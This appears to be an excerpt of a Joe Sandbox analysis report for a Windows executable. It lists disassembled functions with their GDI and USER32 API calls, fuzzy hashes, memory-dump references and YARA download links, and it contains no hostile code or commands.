Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83808c113533e596193f80ca015d30f79171b58599bd88d17ecf3d6626dbd96
Instruction ID: 07b612345c5bbe0903390d462789ffb2e13e6bbc66afdc4e6bc4dd4d887f0ca6
Opcode Fuzzy Hash: b83808c113533e596193f80ca015d30f79171b58599bd88d17ecf3d6626dbd96
Instruction Fuzzy Hash: 7B51B4B2D052549BE728CB28CD95AEFB775EB95304F0441FBE90D96280D7785BC1CD42

Function 004587E4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d202ab2e3a82963ffa040015ffccdeaae6a1e967d090a0d9369d95805e603c39
Instruction ID: 0cb8e15f253dbae80a83ecebc53f321e8f76eab8be4364671ea332baa4bb53a5
Opcode Fuzzy Hash: d202ab2e3a82963ffa040015ffccdeaae6a1e967d090a0d9369d95805e603c39
Instruction Fuzzy Hash: 06414A356515008BDB40EF2AD9C6AC977A2BFC9314F5981F6AC0C9F66BCB34AC418B64

Function 0044B1B0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 939cd1568bbae89738f843fc4c20c1036eb5cc41475567d7fab4f492866bde0b
Instruction ID: db1e48b56d2139b794d813d5d0d301d51b7349e02c902c6c1ed381e71b07a667
Opcode Fuzzy Hash: 939cd1568bbae89738f843fc4c20c1036eb5cc41475567d7fab4f492866bde0b
Instruction Fuzzy Hash: 4D412B352115018BDB40EF2AD5C5EC977A1BFC9314F6981F6AC0C9F66BCB38AC818B64

Function 004620F4 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: EnableItemMenu
String ID:
API String ID: 1841910628-0
Opcode ID: e2903d5bb9c4dd6ac4ea60216a1dd791169cc505b2eed14ee16483c55de24208
Instruction ID: 0d679d4c64bbe0c279c63d16ab9808314fe99795dea1de2b1f05ee53d1f37c5e
Opcode Fuzzy Hash: e2903d5bb9c4dd6ac4ea60216a1dd791169cc505b2eed14ee16483c55de24208
Instruction Fuzzy Hash: 0A218F306046418BD744EF2BC9C56C973A26F85308F1990B6AC588F26FDE799C45C625

Function 00404F2A Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bbcf3ed41b8220567ef3c19cbc046ed478e8d3a52c49dc6c4669113511ed000
Instruction ID: 66b4a5b418ca3aa93d94aa6819b81951ef199160f92cad829b40cb9c4f820241
Opcode Fuzzy Hash: 8bbcf3ed41b8220567ef3c19cbc046ed478e8d3a52c49dc6c4669113511ed000
Instruction Fuzzy Hash:

Function 0041F34C Relevance: 33.2, APIs: 22, Instructions: 213
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

73E9A570.USER32(00000000,?,0041C1F0,?), ref: 0041F380
73EA4C40.GDI32(?,00000000,?,0041C1F0,?), ref: 0041F38C
73EA6180.GDI32(0041C1F0,?,00000001,00000001,00000000,00000000,0041F5A2,?,?,00000000,?,0041C1F0,?), ref: 0041F3B0
73EA4C00.GDI32(?,0041C1F0,?,00000000,0041F5A2,?,?,00000000,?,0041C1F0,?), ref: 0041F3C0
SelectObject.GDI32(0041F77C,00000000), ref: 0041F3DB
FillRect.USER32(0041F77C,?,00000000), ref: 0041F416
SetTextColor.GDI32(0041F77C,00000000), ref: 0041F42B
SetBkColor.GDI32(0041F77C,00000000), ref: 0041F442
PatBlt.GDI32(0041F77C,00000000,00000000,0041C1F0,?,00FF0062), ref: 0041F458
73EA4C40.GDI32(?,00000000,0041F55B,?,0041F77C,00000000,?,0041C1F0,?,00000000,0041F5A2,?,?,00000000,?,0041C1F0), ref: 0041F46B
SelectObject.GDI32(00000000,00000000), ref: 0041F49C
73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041F54A,?,?,00000000,0041F55B,?,0041F77C,00000000,?,0041C1F0), ref: 0041F4B4
73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041F54A,?,?,00000000,0041F55B,?,0041F77C,00000000,?), ref: 0041F4BD
73E98830.GDI32(0041F77C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041F54A,?,?,00000000,0041F55B), ref: 0041F4CC
73E922A0.GDI32(0041F77C,0041F77C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041F54A,?,?,00000000,0041F55B), ref: 0041F4D5
SetTextColor.GDI32(00000000,00000000), ref: 0041F4EE
SetBkColor.GDI32(00000000,00000000), ref: 0041F505
73EA4D40.GDI32(0041F77C,00000000,00000000,0041C1F0,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041F54A,?,?,00000000), ref: 0041F521
SelectObject.GDI32(00000000,?), ref: 0041F52E
DeleteDC.GDI32(00000000), ref: 0041F544

Part of subcall function 0041B938: GetSysColor.USER32(000000FF), ref: 0041B942

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
String ID:
API String ID: 1952589944-0
Opcode ID: f00b7c88b0e7b4d52b51addc497413af15c992ca45d0dc54bab75c99eda85bcc
Instruction ID: 0c227054ab2381de318a775568555f5aacf75bb7053bc113b6391edc4d6b05be
Opcode Fuzzy Hash: f00b7c88b0e7b4d52b51addc497413af15c992ca45d0dc54bab75c99eda85bcc
Instruction Fuzzy Hash: 5161CA71A00608ABDF10EBE9CC46FAFB7B8EF48704F10446AB514FB291D67899458B68

Function 004206F8 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 60
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

73E9A570.USER32(00000000,?,0041A7DD), ref: 004206FB
73EA4620.GDI32(00000000,0000005A,00000000,?,0041A7DD), ref: 00420705
73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,0041A7DD), ref: 00420712
MulDiv.KERNEL32(00000008,000A2BF2,00000048), ref: 00420721
GetStockObject.GDI32(00000007), ref: 0042072F
GetStockObject.GDI32(00000005), ref: 0042073B
GetStockObject.GDI32(0000000D), ref: 00420747
LoadIconA.USER32(00000000,00007F00), ref: 00420758

Strings

t,, xrefs: 004207BE
B,, xrefs: 00420772
2,, xrefs: 0042075D
f,, xrefs: 0042079C
,, xrefs: 0042074C
T,, xrefs: 00420787

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ObjectStock$A4620A480A570IconLoad
String ID: ,$2,$B,$T,$f,$t,
API String ID: 2905290459-3751022116
Opcode ID: 32e6608d651c22de18dab1f80a23f1d6fae10decc80fd7e2ea5cc63e61cb24d3
Instruction ID: 3273c547ea6fb4c0011b0c3bfdd8bc0de7569a4da085e98f308dd47f7168c226
Opcode Fuzzy Hash: 32e6608d651c22de18dab1f80a23f1d6fae10decc80fd7e2ea5cc63e61cb24d3
Instruction Fuzzy Hash: C71124B0A412055EE340BFA65C427AA3A90D75570CF00853BF608EF3D3D77D18509BAD

Function 004309FC Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 358
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00430830: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0043086B

MulDiv.KERNEL32(00000008,?,00000004), ref: 00430A65
MulDiv.KERNEL32(00000008,?,00000008), ref: 00430A75
MulDiv.KERNEL32(0000000A,?,00000004), ref: 00430A82
MulDiv.KERNEL32(0000000A,?,00000008), ref: 00430A8F
MulDiv.KERNEL32(00000032,?,00000004), ref: 00430A9C
MulDiv.KERNEL32(0000000E,?,00000008), ref: 00430AA9
MulDiv.KERNEL32(00000004,?,00000004), ref: 00430AB6

Part of subcall function 00425AEC: GetSystemMetrics.USER32(00000000), ref: 00425AEE

SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ADA
LoadIconA.USER32(00000000,?), ref: 00430C4E
DrawTextA.USER32(00000000,00000000,000000FF,?,00000410), ref: 00430B00

Part of subcall function 00406264: LoadStringA.USER32(00400000,?,?,00000400), ref: 00406281

Strings

Image, xrefs: 00430C34
, xrefs: 00430B30
Message, xrefs: 00430C8A

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: LoadText$DrawExtentIconMetricsPointRectStringSystem
String ID: $Image$Message
API String ID: 1199760683-721294388
Opcode ID: a6baf6c44a51cc4c3aa53b8052f74a1803528a6e86a8c520cde8f2675d922809
Instruction ID: 257d61fdd710df6463c119f8ab8ae9a9f7733ffdfe8e19c53f8051e79a525f70
Opcode Fuzzy Hash: a6baf6c44a51cc4c3aa53b8052f74a1803528a6e86a8c520cde8f2675d922809
Instruction Fuzzy Hash: 2BD16E70B002189FDB00EFA9D895B9EB7F5AF48308F14516AF500EB392CB78AD45CB59

Function 0041CC0C Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON

Download Yara Rule

APIs

73EA4C40.GDI32(00000000), ref: 0041CC23
73EA4C40.GDI32(00000000,00000000), ref: 0041CC2D
GetObjectA.GDI32(?,00000018,?), ref: 0041CC3F
73EA6180.GDI32(?,?,00000001,00000001,00000000,?,00000018,?,00000000,00000000), ref: 0041CC56
73E9A570.USER32(00000000,?,00000018,?,00000000,00000000), ref: 0041CC62
73EA4C00.GDI32(00000000,?,?,00000000,0041CCBB,?,00000000,?,00000018,?,00000000,00000000), ref: 0041CC8F
73E9A480.USER32(00000000,00000000,0041CCC2,00000000,0041CCBB,?,00000000,?,00000018,?,00000000,00000000), ref: 0041CCB5
SelectObject.GDI32(?,?), ref: 0041CCD0
SelectObject.GDI32(?,00000000), ref: 0041CCDF
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0041CD0B
SelectObject.GDI32(?,00000000), ref: 0041CD19
SelectObject.GDI32(?,00000000), ref: 0041CD27
DeleteDC.GDI32(?), ref: 0041CD30
DeleteDC.GDI32(?), ref: 0041CD39

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Object$Select$Delete$A480A570A6180Stretch
String ID:
API String ID: 1888863034-0
Opcode ID: 040ecc5772938c203d573dee8bf94e918e45614d0b3d6447df826966a0e696be
Instruction ID: 5de1f15de0170935d093a7219c59515ebf3cebb42a252e4a662bd2a93b6d6753
Opcode Fuzzy Hash: 040ecc5772938c203d573dee8bf94e918e45614d0b3d6447df826966a0e696be
Instruction Fuzzy Hash: A841E171E40609ABDF00EAE9CC85FEFB7BCEB08704F100466B604FB281D6795D408BA8

Function 00426128 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00421D08: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00000000,?,00421E4F,?,?,?), ref: 00421D26

GetClassInfoA.USER32(00400000,00425F30), ref: 00426153
RegisterClassA.USER32(0049E654), ref: 0042616B
GetSystemMetrics.USER32(00000000), ref: 0042618D
GetSystemMetrics.USER32(00000001), ref: 0042619C
SetWindowLongA.USER32(?,000000FC,?), ref: 004261F8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00426219
GetSystemMenu.USER32(?,00000000,?,000000FC,?,00000000,00000000,00400000,00425F30,?,004264C0), ref: 00426224
DeleteMenu.USER32(00000000,0000F030,00000000,?,00000000,?,000000FC,?,00000000,00000000,00400000,00425F30,?,004264C0), ref: 00426233
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,?,00000000,?,000000FC,?,00000000,00000000,00400000,00425F30), ref: 00426240
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,?,00000000,?,000000FC,?,00000000,00000000), ref: 00426256

Strings

0_B, xrefs: 00426147, 004261C8

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
String ID: 0_B
API String ID: 183575631-2128305573
Opcode ID: 0816de0b0f54aae0f26d71197ed4a79a30c0b55f69513bd9a4970f3a412fb89f
Instruction ID: d9c5f861f1c2af8d96e04b9b15fdcf03a997e527852d5a19c901a1b65e2e797c
Opcode Fuzzy Hash: 0816de0b0f54aae0f26d71197ed4a79a30c0b55f69513bd9a4970f3a412fb89f
Instruction Fuzzy Hash: 803173B17416107AFB10BB65AC82F6636989B14708F95057AFA04EF2D7C5BDEC004B6D

Function 00407A34 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00407C7C,?,?,?,?,00000000,00000000,00000000), ref: 00407A4E

